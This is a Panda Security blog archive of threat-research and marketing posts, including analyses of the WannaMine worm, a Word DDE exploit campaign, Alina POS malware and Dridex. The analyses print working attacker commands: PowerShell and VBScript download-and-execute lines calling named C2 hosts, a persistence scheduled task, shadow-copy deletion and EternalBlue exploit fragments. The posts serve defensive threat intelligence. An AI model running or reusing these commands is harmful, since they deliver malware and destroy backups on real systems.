Tag Archives: PandaLabs

Cryptocurrency. A tool for criminals?

Cryptocurrencies had an exceptional year in 2017. Both the technology and the value of virtual currencies have experienced historic breakthroughs. At the same time, the rise of these digital currencies is causing serious concerns in the world of cybersecurity. Are cryptocurrencies mainly a tool for criminals?

What are cryptocurrencies?

Cryptocurrencies first appeared due to the need to make anonymous transactions. While the idea of a decentralized digital currency first came about in 1998, it wasn’t until 2009 when the first cryptocurrency was created: Bitcoin. Currently, more than 1,300 cryptocurrencies exist. Each one has a different origin and characteristics, but all are alike in that they are digital and attempt to ensure anonymity in transactions.

Cryptocurrencies guarantee a complete, balanced and secure way to make transactions. That’s why they are used as a currency for the exchange of goods and services. They can also be exchanged for money, including other cryptocurrencies. Some digital currencies are only used to buy certain types of goods or other cryptocurrencies, while the best-known cryptocurrencies, such as Bitcoin, Ethereum and Litecoin, can be used like regular money.

One of the most common concerns surrounding cryptocurrencies is the fact that they have to be mined. Many digital currencies are obtained through performing mathematical computations, and much like powering any other computer, cryptocurrencies are obtained through the energy expenditure these operations produce. The legality of cryptocurrencies is currently a hot topic. There are countries considering prohibiting the use of the digital assets, while in others they are stuck in a sort of legal limbo.

Blockchain and digital security

Naturally there are genuine concerns regarding the safety of cryptocurrencies. After all, one wonders if their digital foundation could be exploited by cybercriminals, or if there is a possibility of cryptocurrencies being hacked and created from scratch. As we explained earlier, the reality is cryptocurrencies are generally very safe. Although cracking the existing security of a cryptocurrency is mathematically possible, the cost of doing so is prohibitively high.

It would require more computer power than any large technology could possibly have. This is mostly due to the fact that cryptocurrencies use blockchain technology. A blockchain consists of a distributed database, and by design, blockchains are completely tamper-proof. To that effect, cryptocurrencies use trusted timestamping, which proves the exact time that data existed along the chain. Any altering or tampering of the timestamp would break the integrity of the digital currency and devalue it to zero.

Blockchain technology is extremely useful in cryptocurrency mining. So much so that without this technology, digital currencies would not exist or would be very different. Blockchain technology is the cornerstone of cryptocurrencies’ impenetrable defense as well as of their anonymity.

A tool for cybercriminals?

Cryptocurrencies’ solid defense is however a double-edged sword. The anonymity of cryptocurrencies is one of the most appealing aspects for cybercriminals. After all, a digital currency that assures transparency and a simple transaction would appear to be an ideal method of payment for outlaw hackers.

Currently practically all ransomware attacks ask for payment through Bitcoin or other cryptocurrencies. However, this is not the only appeal for cybercriminals. The “PandaLabs Annual Report 2017” states that cryptocurrency mining infections are set to increase in frequency.

One of the newest attacks consists of infecting browsers, causing users to behave like cryptocurrency miners. This sort of attack will probably only become more common. While theft or loss of a user’s cryptocurrency wallet is much more difficult, it is still possible. One example is the recent freeze of hundreds of millions of dollars’ worth of Ether, Ethereum’s digital currency.

Despite the unfortunate fact that the use of cryptocurrencies will probably always be linked to cybercrime, this is a mere unintended result. Cryptocurrencies continue to be of great use, despite their extreme volatility. There are increasingly more businesses and countries using digital currencies to exchange services or influence the economy in a secure way. That said, security can sometimes manifest itself in strange ways and have the opposite effect of its original intent, which can lead to catastrophic consequences for a company if it is not well prepared.

The post Cryptocurrency. A tool for criminals? appeared first on Panda Security Mediacenter.

Read More

Cyber Sabotage at the Winter Olympics

On Monday, while spectators were being dazzled by the opening ceremony of the 2018 Winter Olympics, held in Pyeongchang, the Olympics organizing committee was busy dealing with a cyberattack.

The decline in new malware samples and the professionalization of attacks on networks are setting new standards in cybersecurity. In this case, we’re dealing with a targeted attack and an act of sabotage, in which hackers sought to cause chaos during the opening ceremony. It affected some television and internet services before the ceremony, but was not successful in stealing data from servers.

Researchers from Cisco’s Talos division also added that the malware’s purpose was not theft, but rather destruction.

GoldDragoN, the latest Russian hack?

With the focus usually centered on maximum profit, there’s been an increase in the number of advanced infiltrations using sharp new tactics, such as malwareless attacks and the abuse of non-malicious tools.

PandaLabs explains that by not using malware, which is easily detected by advanced cybersecurity tools, attackers assume the identity of the administrator after having obtained  their network credentials. They warn that the techniques used by cybercriminals to attack without using malware can be highly varied, taking advantage of all kinds of non-malicious tools that are part of the day to day of IT managers.

In this case, the attack did in fact use malware (named GoldDragon), but to carry out certain actions it used non-malicious tools such as PsExec or the CMD itself. In this way, it was able to execute processes on other computers connected to the network without raising suspicion and without using a version modified by the attackers, but rather the official version.

To carry out its destructive actions, it launched system commands from a command window (cmd). Instructions looked like this:

C:Windowssystem32cmd.exe /c c:Windowssystem32vssadmin.exe delete shadows /all /quiet

Here, the vssadmin.exe is used to silently erase the backup copies created by the operating system.

Everything seems to indicate that the attack came from Russia. Ukrainian intelligence and a CIA report linked NotPetya and BadRabbit to Russian intelligence, and in the case of GoldDragon (also called Olympic Destroyer), all signs point to a more refined version of BadRabbit.

System tools as a new attack vector

Monitoring the execution of all processes on company workstations and servers is essential to avoiding close calls like the one we witnessed in this year’s winter olympics.

Traditional antiviruses are not able to detect these types of attack, nor to remediate them. However, Panda Adaptive Defense proposes a new security model based on the monitoring, control, and classification of behavior and the nature application in execution to offer robust and complete protection.

PandaLabs recommends the use of advanced cybersecurity solutions such as Panda Adaptive Defense, which also allow the client’s existing infrastructure to coexist with traditional antivirus systems and integrate with existing SIEM solutions.

The post Cyber Sabotage at the Winter Olympics appeared first on Panda Security Mediacenter.

Read More

PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018

Today, more malware samples are created in just a few hours than in the entire twentieth century. The targets have changed, the techniques have become more sophisticated, the attack vectors have multiplied, and the tools are more precisely designed. Attackers are meticulously studying their victims to adapt their strategy and achieve the greatest possible impact.

Their efficiency, effectiveness, and profitability are proven time and again, with up to 75 million distinct malware files created between the beginning of the year and October, which translates to 285,000 new samples detected every day by PandaLabs.

2017 Cybersecurity Trends

More than half of attacks are motivated by financial targets, while espionage is the second greatest motivating factor.

Stealth attacks with adaptive lateral movements are becoming all too common.

Malwareless attacks are increasingly favored by attackers. They prefer to remain invisible to traditional protection models, and do not require the victim’s interaction. These attacks can double profitability when optimally executed.

Tools for exploiting vulnerabilities have given rise to new attack vectors that require no human interaction.

The endpoint is the target. The perimeter has become blurred, mobility is the norm in any company, and corporate networks are therefore much more exposed.

Ex-employees attempted to extort their previous companies, initiating attacks from within the company.

There was a larger presence of organized cybercriminal groups, such as the Lazarus Group, attacking the media, the aerospace and financial sectors, as well as critical infrastructures in the US and elsewhere.

Cyberwarfare and cyber-armies: in a full on arms race in cyberspace, nations are creating cyber command centers to bolster defenses against attacks on companies and infrastructures.


In 2017, PandaLabs analyzed and neutralized a total of 75 million malware files, about 285,000 new samples a day.

One thing is clear: there are many more malware samples, and each of them is infecting fewer devices individually. Each malware sample will attack a minimum number of devices in order to lower the risk of being detected and thereby achieve its goal.

This is supported by the fact that of all the new malware (PE files) never seen before this year (15,107,232), only 99.10% have been seen only once; in other words, in 14,972,010 samples. If we look at the figures from the other end, we see that indeed an insignificant part of all the malware is truly widespread. We have only seen 989 malware files on more than 1,000 computers — 0.01%.

This confirms what we already knew: with a few exceptions — such as WannaCry or HackCCleaner — most malware changes every time it infects, so each copy has a very limited distribution.

Cybersecurity Predictions for 2018

Cyberwarefare and its consequences: Instead of an open war where the opposing sides are clearly identifiable, we are facing a guerrilla strategy with isolated attacks whose authors are never clear. Freelancers at the service of the highest bidder, false flag operations, and an increase in collateral victims of these attacks is what’s in store for 2018.

Malwareless hacking attacks: attacks that abuse non-malicious tools or compromised applications to carry out their efforts will increase.

Malware for mobile devices and the Internet of Things will continue to rise. In general, IoT devices are not targeted by cybercriminals as the ultimate goal. But when compromised, these devices increase the attack surface and are used as a gateway to the company’s network.

More advanced attacks and more ransomware can be expected in the coming year. These attacks promise a high return on their investment at a low level of risk.

Companies will spearhead awareness-building initiatives for attacks: for the first time in history, the public will be aware of attacks that happen and are in many cases subsequently covered up, thanks to the new GDPR legislation.

Social networks and propaganda: there will be an increase in fake news due to the ability of these platforms to influence public opinion. Facebook, the largest social network in the world, is already taking action on the matter. If it is discovered that a Facebook page repeatedly distributes false news, it will prohibit it from being publicized on the social network.

Cryptocurrency: the use of cryptocurrencies will continue to grow, and all the cybercrime that surrounds it, such as infecting computers with cryptocurrency mining software or the theft of user wallets, will follow suit.


Security update protocols should be a priority at all companies. Cases such as WannaCry or Equifax reaffirm this, as every day that passes without patching a vulnerable system puts the company at risk, as well as the integrity of its data, including that of customers and suppliers. Production can be endangered and incur millions in losses.

Countries are investing more and more in defensive and offensive capabilities, with a focus on critical infrastructures.

2018 augurs a more dangerous situation. For many professionals, a change of mentality (and strategy) will be necessary to achieve the highest levels of security and protect the assets of their companies’ networks.

Both in business and at home, training and awareness are key. It follows that cybersecurity, often forgotten by management, will require a greater investment.

Having in-depth knowledge of attacks and what they consist of should be the basis for a good defensive strategy. Machine Learning tools and the investigations of Threat Hunting teams are essential to avoid future intrusions.

Signature files no longer work and the figures speak for themselves: more than 99% of all malware never appears again anywhere else.

There is a problem of focus: solutions that remain focused on fighting against malware (the majority of those available on the market) are doomed to become extinct if they do not change their strategy.

And of course, we can’t forget international cooperation and the creation of common legislative frameworks such as the GDPR. Having political and economic support and a plan of action will make it possible to benefit from the latest technological advances in the safest manner.

In the PandaLabs Annual Report, you can learn about real cases, review the most discussed attacks of 2017, and read more about what lies ahead in 2018.

The post PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018 appeared first on Panda Security Mediacenter.

Read More

Alina, the Latest POS Malware

The danger of having the data of thousands of credit cards recorded makes Point of Sale (POS) terminals a critical system, as well as an increasingly sought-after target of cybercrime. Attacking these devices anonymously online is relatively straightforward, and selling the data on the black market is profitable.

We’ve recently detected infections at a significant number of bars and restaurants in the United States whose POS terminals were attacked by two variants of credit card theft malware.

The malware samples that we’ll be analyzing are the following:

File name                          MD5

Epson.exe                           69E361AC1C3F7BCCE844DE43310E5259

Wnhelp.exe                       D4A646841663AAC2C35AAB69BEB9CFB3

Epson.exe presents an invalid certificate:

Both samples were compiled with Microsoft Visual C ++ 8, and are not packaged or encrypted. Once the malware is executed in the system, it proceeds to analyze the different system processes in search of credit cards.

Here we can see how they go through the different processes looking only for those that can contain credit cards in memory:

In the case of the “Epson.exe” sample, it will search for credit cards in the following processes:

Program name Description           
notepad++.exe Text editor
CreditCardService.exe Microsoft
DSICardnetIP_Term.exe NETePay for Mercury
DSIMercuryIP_Dial.exe NETePay for Mercury
EdcSvr.exe Aloha Electronic Draft Capture (EDC)
fpos.exe Future POS
mxSlipStream4 / mxSlipStream5 / mxSlipStream.exe / mxSwipeSVC.exe SlipStream POS System Transaction Processor by mXpress
NisSrv.exe Windows 8
spcwin.exe/ Spcwin.exe / SPCWIN.exe /SPCWIN.EXE POSitouch (Food Service Industry POS System)

On the other hand, the “Wnhelp.exe” sample contains a list that is used to discard the processes to be analyzed. If the process name coincides with any item on the list, it will not be analyzed in the search for credit cards:

Discarded processes:
explorer.exe alg.exe
chrome.exe wscntfy.exe
firefox.exe taskmgr.exe
iexplore.exe spoolsv.exe
svchost.exe QML.exe
smss.exe AKW.exe
csrss.exe OneDrive.exe
wininit.exe VsHub.exe
steam.exe Microsoft.VsHub.Server.HttpHost.exe
devenv.exe vcpkgsrv.exe
thunderbird.exe dwm.exe
skype.exe dllhost.exe
pidgin.exe jusched.exe
services.exe jucheck.exe
winlogon.exe lsass.exe


In both samples, once the process it wishes to analyze is obtained, whether because it was contained on the list – as with Epson.exe – or because it was discarded – as with Wnhelp.exe – it will create a new thread:

And will then proceed to analyze the memory using an algorithm specifically designed to check whether the found data is from credit cards:

The Wnhelp.exe sample is executed by the attackers with the command “install”, in such a way that it creates a service to ensure its persistence in the system:

The service is called “Windows Error Reporting Service Log”.

The sample Epson.exe works in the same way, although attackers can configure the name of the service as they want through parameters:

install [Service name] [Service description] [Third parameter]

Each variant connects to a different command and control (C&C) server:

Epson.exe dropalien.com/wp-admin/gate1.php
Wnhelp.exe www.rdvaer.com/ wp-admin/gate1.php


They can then receive different orders from the attacker:

Commands Description
update = [URL] Malware update.
dlex = [URL] Downloads and runs file.
chk = [CRC_Checksum] Updates the file’s checksum.

To connect the control panel, they use the following UserAgent:

“Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.152 Safari/537.22”

The communication is carried out by an SSL. The malware modifies the internet connection configuration to ignore unknown CAs (Certificate Authorities), thereby ensuring that it will be able to use its own certificate.

First it obtains the internet connection security flags through the InternetQueryOptionA API with the third argument set to the value INTERNET_OPTION_SECURITY_FLAGS (31). Once obtained, it carries out a binary OR with the flag SECURITY_FLAG_IGNORE_UNKNOWN_CA (100h).

Conclusion: How to Confront a POS Attack

Attacks on POS terminals are still very popular, especially in countries like the United States where the use of Chip & PIN is not mandatory. Many of these attacks target businesses that do not have specialized personnel in computer science, much less in security, an oversight that attackers can take advantage of.

POS terminals are computers that handle critical data and therefore must be fortified to the maximum in order to shield customer data from the inherent risks. Solutions such as Adaptive Defense 360 help to ensure that no malicious process is executed in these terminals. There is no need to hire a security specialist, because the solution includes Panda Security’s own technicians, who will be responsible for ensuring that everything all executed processes are safe.

The post Alina, the Latest POS Malware appeared first on Panda Security Mediacenter.

Read More

Threat Hunting, the Investigation of Fileless Malware Attacks

 Fileless Monero WannaMine, a new attack discovered by PandaLabs


Mining cryptocurrencies like Bitcoin, Ethereum or Monero is nothing new. In fact, in recent years we have seen numerous attacks whose main objective is the installation of mining software. For example, it is worth remembering that before WannaCry, we had already seen attackers use the NSA EternalBlue exploit to infiltrate companies and install this type of software on their victims’ devices.

It’s safe to say that it is a booming business, as sophistication of the attacks continues to increase. A few days ago we detected a new worm that uses both hacking tools and scripts to spread through corporate networks and mine the Monero cryptocurrency in any network it makes its way into.

With Adaptive Defense, we monitor all running processes in real time on every computer where it is installed. When our Threat Hunting team observed the following command attempting to execute through one of the processes on one computer, alarms were raised:

cmd /v:on /c for /f “tokens=2 delims=.[” %i in (‘ver’) do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%11.vbs&@echo Set ox=CreateObject^(“MSXML2.XMLHTTP”^)>>%windir%11.vbs&@echo ox.open “GET”,”http://stafftest.firewall-gateway.com:8000/info.vbs“,false>>%windir%11.vbs&@echo ox.setRequestHeader “User-Agent”, “-“>>%windir%11.vbs&@echo ox.send^(^)>>%windir%11.vbs&@echo If ox.Status=200 Then>>%windir%11.vbs&@echo Set oas=CreateObject^(“ADODB.Stream”^)>>%windir%11.vbs&@echo oas.Open>>%windir%11.vbs&@echo oas.Type=1 >>%windir%11.vbs&@echo oas.Write ox.ResponseBody>>%windir%11.vbs&@echo oas.SaveToFile “%windir%info.vbs”,2 >>%windir%11.vbs&@echo oas.Close>>%windir%11.vbs&@echo End if>>%windir%11.vbs&@echo Set os=CreateObject^(“WScript.Shell”^)>>%windir%11.vbs&@echo os.Exec^(“cscript.exe %windir%info.vbs”^)>>%windir%11.vbs&cscript.exe %windir%11.vbs) else (powershell -NoP -NonI -W Hidden “if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info6.ps1′)}else{IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info3.ps1′)}“)

Analysis of Network Propagation

Soon after beginning our investigation from PandaLabs, we observed how the attackers, knowing that they’d been discovered, closed off command and control servers, but before they could we were able to download the following files:

  • b6fcd1223719c8f6daf4ab7fbeb9a20a            ps1 ~4MB
  • 27e4f61ee65668d4c9ab4d9bf5d0a9e7 vbs ~2MB

They are two highly obfuscated scripts. “Info6.ps1” loads a Mimikatz module (dll) in a reflectively (leaving the disk untouched) so that it can steal credentials. These credentials will be used later to move laterally on internal (unprotected) networks.

The script implements, in Powershell, the famous NetBios exploit, known as EternalBlue (MS17-010), so that it can proceed to infect other not-yet-patched Windows computers on the network.

$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56

At the same time it makes use of WMI to remotely execute commands. Once the passwords for a computer are obtained, we see the “wmiprvse.exe” process on that computer execute a command line similar to the following:

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad…

If we decode the “base 64” of this command line, we obtain the script shown in Annex I.

Persistence in the System

Within one of the scripts, the following command can be found to achieve persistence in the system:

cmd /c echo powershell -nop “$a=([string](Get-WMIObject -Namespace rootSubscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(‘SCM Event Filter’)))) {IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.spdns.eu:8000/mate6.ps1’)}” >%temp%y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR “%temp%y1.bat” &&SCHTASKS /run /TN yastcat

As you can see, it programs a daily task that downloads and executes the “y1.bat” file.

Note that we do not have this file at our disposition, as the command and control servers are currently offline.

Infection Vector 

We still do not know the initial infection vector, since networks on which we detected and blocked the infection were in the process of deploying Adaptive Defense at that time and did not have the whole network protected with our advanced cybersecurity solution. For this reason, we have not been able to determine who the “patient zero” was and how it became compromised.

It could be a download/execution of a file/Trojan that initially activated the worm, or it could have been executed remotely using some exploit.

Command and Control Servers

From the “info6.ps1” script, we were able to obtain the following command and control servers.

  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95

Note that on October 27, 2017, these servers ceased to be operative.




  • exe ( Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196 )
  • %windir%11.vbs
  • %windir%info.vbs
  • %windir%info6.ps1
  • dll
  • dll
  • Tarea programada “yastcat”
  • spdns.eu
  • firewall-gateway.com
  • 179.67.243
  • 184.48.95


Once again, we are witnessing the professionalization of increasingly advanced attacks. Even when it is only a matter of installing Monero miners (and we leave aside data theft, sabotage, or espionage), attackers are using advanced techniques and sharp tactics. The fact that it is a fileless attack makes it so that a majority of traditional antivirus solutions are barely able to counteract or even detect it, and its victims can only wait for the necessary signatures to be generated (the attack is fileless, but as we have seen at one point, both the scripts and the Monero client are downloaded).

But this only serves for this particular attack, and anything that varies even slightly will be useless, not to mention that only the end of the attack is detected, without seeing how it moves through the network and compromises computers.

Since Adaptive Defense not only classifies all running processes on every computer, we are able to monitor the entire network in real time, something which is becoming increasingly necessary as attackers resort to malwareless techniques in which they abuse legitimate system tools.

Among the events we monitor, we can find:

  • Process creation and remote injection
  • Creation, modification and opening of files
  • Creation and modification of registry entries
  • Network events (communication aperture, file download, etc.)
  • Administrative events (creation of users, etc.)

We will keep you updated with any findings from our Threat Hunting, as well as the detection of any new attacks.

The post Threat Hunting, the Investigation of Fileless Malware Attacks appeared first on Panda Security Mediacenter.

Read More

A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office and which was already actively being exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.


The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “


Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

Depending on which simple is analyzed, we can see that the download URL changes, despite the command being essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e

The following powershell script is downloaded and executed:

$urls = “hxxp://shamanic-extracts.biz/eurgf837or”,”hxxp://centralbaptistchurchnj.org/eurgf837or”,””,”hxxp://conxibit.com/eurgf837or”

foreach($url in $urls){



Write-Host $url

$fp = “$env:temprekakva32.exe”

Write-Host $fp

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $fp)

Start-Process $fp





Write-Host $_.Exception.Message



From this URL:


And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:


The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.

Read More

Dridex, the Latest Version of the Credential Theft Malware

At the beginning of the year we talked about a new evolution of cyber theft in the banking sector, and today, we are pleased to share a report that has been painstakingly prepared by the malware laboratory at Panda Security on the latest version of Dridex, a famous banking Trojan known for its sophistication and ability to go undetected on infected computers.

What is Dridex?

The present document gathers analysis of a new variant of harmful code called “Dridex”, specifically the fourth version.

Dridex is a banking Trojan famous for its sophistication and its ability to go undetected on the devices it infects. These devices, once infected, are incorporated onto a modular botnet, at which point malicious characteristics, whether external or their own, can be freely added to them, via modules or libraries (sold separately).


The first version appeared toward the end of 2014. At the beginning of 2015, a new, important update was launched, giving way to a second version. When looking at the earlier versions of Dridex, the most stable and resistant of them was the third, which was launched in April 2015 and was used in well-known cyberattacks up until the fourth version, the latest known version and subject of this report, which was found in February of 2017.

No new major updates for Dridex had been found since the dismantlement of important components of the botnet, carried out by government agencies in 2015.

This new variant of the banking Trojan incorporates new functionalities. One of these is called AtomBombing, a functionality whose aim is to inject code without calling suspicious APIs to avoid being detected by monitoring systems. It incorporates the DLL hijacking technique to achieve persistence. Finally, various cryptographic methods were optimized and used to obtain the configuration.

Characteristics of the Trojan

The following are some static properties of the analysed file.

The hash of the Trojan:

MD5 001fcf14529ac92a458836f7cec03896
SHA256 a6db7759c737cbf6335b6d77d43110044ec049e8d4cbf7fa9bd4087fa7e415c7


The internal date of creation of the analyzed sample is May 16, 2017. The file in question was compiled to be executed in 64 bit environments and, at the same time, simulate the legitimate dll of Microsoft.

Figure 1. File properties

Additionally, it is encrypted with a distinctive algorithm to avoid detection by antiviruses.

It has been observed that the executable has a fairly high number of sections, 11 in total, as we can see in Figure 2:

Figure 2. Static information of the analyzed binary

In the DATA section, we can observe that the entropy is at 7.799, and is a fairly large in size. It is in this section that the highly encrypted and packaged binary (which, once decrypted, becomes the real malicious code) can be found.

In the first decrypted layer, the executable stores memory in the process, then copies the code and, finally, summons it and runs it, as we see in Figure 3:

Figure 3. Jump to shellcode

The first thing the code does is to obtain the addresses of the functions that it will eventually be using. It does this with a dynamic search through the libraries downloaded by the program.

To carry out this task, it runs through the PEB_LDR_DATA structure and the LDR-MODULE structures to locate the base address of the loaded dlls. It proceeds to access the offset of the export table in order to run through all of the functions exported by the dll and find the address of the sought function in he computer’s memory.

Figure 4. Enumeration of loaded modules

The shellcode, in turn, checks to see whether there is a hook in the undocumented LdrLoadDll function, accessing its address and checking whether the first byte is the same as E9, the equivalent of a jmp assembler.

Figure 5. Hook Verification

If the previous verification was successful, it proceeds to demap the dll memory process with the name “snxhk.dll” which is an Avast and AVG library that creates hooks to monitor processes happening in the sandbox.

Figure 6. Library: snxhk.dll

Finally, the shellcode decrypts the executable found in the DATA section in the computer’s memory, copies it into the base image’s address, and then runs the new resulting executable.

Figure 7. Decrypted executable

In summary, the full process of the sample being unpacked can be seen in Figure 8, where it is detailed more schematically.

Figure 8. Complete unpacking process

Make sure to use advanced cybersecurity solutions like Adaptive Defense 360 that monitor the organization’s systems in real time, detecting and stopping any suspicious behavior that could be harmful to your business.

For more information, download the full report:

The post Dridex, the Latest Version of the Credential Theft Malware appeared first on Panda Security Mediacenter.

Read More

Enterprise Security in the Age of Advanced Threats


The malware and IT security panorama has undergone a major change, and enterprise security will never be the same. Hackers have improved drastically, both in terms of volume and sophistication, new techniques are allowing threats to remain on corporate networks for much longer periods than ever before.

Webinar  on the topic presented by Panda’s own Luis Corrons, Technical Director of PandaLabs.

How Predictive Intelligence Helps to Protect Companies

The task of protecting an enterprise is a challenge because it has hundreds of thousands of computers in its network; and a criminal just needs to compromise one of them to succeed. Security companies have working for decades now to advance security to ensure there is never one computer infected.

In the beginning, it was easy, the number of threats was very low, so being able to identify all threats was enough, computers were safe. Some of those threats were complex causing a nightmare for antivirus companies, as it could take several days, even weeks, for the most expert researchers just to create a detection for them. The creators of these viruses were people trying to show off their abilities, how good they were, and that was it, there was no other ulterior motive.

As the internet rose, there became a clear ulterior motive: money. Once cyber-criminals figured out how to benefit financially from these attacks, things really took off, and security companies, once again, had to adjust.

The number of new threats created is growing exponentially. In the old days a virus could take weeks or months to travel from LA to NY, now in a few seconds a virus could go from Washington DC to Tokyo.

Traditional anti-virus approaches included traditional blacklisting and whitelisting. Both blacklisting and whitelisting worked well for a while, but in the age of advanced threats, they can no longer be counted on. Cyber-criminals can try and fail a million times, but as soon as they get it right once, they win. It’s not a level playing field, and security solutions need to evolve to get ahead.

It is an uphill battle for security vendors, but as an industry, we know what it takes to combat the most sophisticated cyber-attacks. Now, it’s a matter of execution, and enterprises recognizing how important security is to their business objectives.


The post Enterprise Security in the Age of Advanced Threats appeared first on Panda Security Mediacenter.

Read More

PandaLabs Records a 40% Increase in Attacked Devices this Quarter

Traditional security solutions, although efficient in protecting against known malware, are incapable of protecting against attacks that use non-malicious tools and other advanced techniques. This argument has gained traction in recent investigations carried out by PandaLabs, the anti-malware laboratory at Panda Security. The laboratory presents its second quarterly report for 2017, which takes a look at some of the most harrowing months in cybersecurity in recent years.


The rise of cybercriminal groups, the hacking of elections in several countries, the leaking of espionage tools, and state-backed large-scale attacks — all of these factors have elevated cyberwarfare to the highest level, shaking the very foundations of cybersecurity across the world.

Main Conclusions from the Quarter:

  • Cybercriminal groups are on the rise: The Shadow Brokers plan to continue publishing stolen NSA data, and the cyberarms race is coming to a boil. Individuals and companies should take extra security precautions.
  • Individuals and businesses, in the crosshairs: Out of all the machines protected by a Panda Security solution, 3.44% of them were attacked by unknown threats, representing an increase of almost 40% from the previous quarter. If we look at the type of client, home users and small businesses make up 3.81% of attacks, while in the case of medium and large companies the figure is 2.28%. Home users have far fewer protective measures in place, and they are therefore more exposed to attacks. Many attacks that successfully run their course in a home setting are easily detained in corporate networks before they can have an effect.

  • Cyberwarfare: the second quarter of the year has marked two of the largest cyberattacks in history. WannaCry and Petya have shown us that governments are not hesitating to “push the button” when it comes to launching a cyberattack and that everyone who uses the internet or connected devices could end up being a collateral victim on the global stage of cyberwarfare. The following are some figures describing the extent and damage of WannaCry:

  • Ransomware attacks are still on the rise, and the only explanation is that there are still victims willing to pay. Otherwise, attacks of this sort would eventually be phased out. It is up to all of us to put an end to these attacks, on the one hand protecting ourselves against becoming victims, and on the other to always keep a backup of our data so as to never pay a ransom.
  • “Zero-day” attacks are the most sought after exploits to launch attacks, as they are completely unknown by the manufacturer of the affected software and allow attackers to compromise computers, even if their software is updated. In April, a vulnerability was discovered which affected various versions of Microsoft Word, and we know that it was being used by attackers from at least January. In that same month of April, Microsoft published a corresponding update to protect Office users.
  • IoT and Smart Cities: hyperconnected cities bring immense security risks that give attacks a multitude of new vectors. Last June, WannaCry infected 55 cameras located at traffic lights and speed control points in Australia after a subcontractor connected an infected computer to the network where they were located. Police had to cancel 8,000 traffic fines following the incident.

PandaLabs Cybersecurity Recommendations

In this context, reinventing cybersecurity with software that can measure up to the threats we face has become a matter of urgency. Only a solution like Panda Adaptive Defense, which combines EDR (Endpoint Detection & Response) technology with the ability to monitor and classify 100% of running processes can reduce the possibility of falling victim to advanced attacks such as those described in this report.

The post PandaLabs Records a 40% Increase in Attacked Devices this Quarter appeared first on Panda Security Mediacenter.

Read More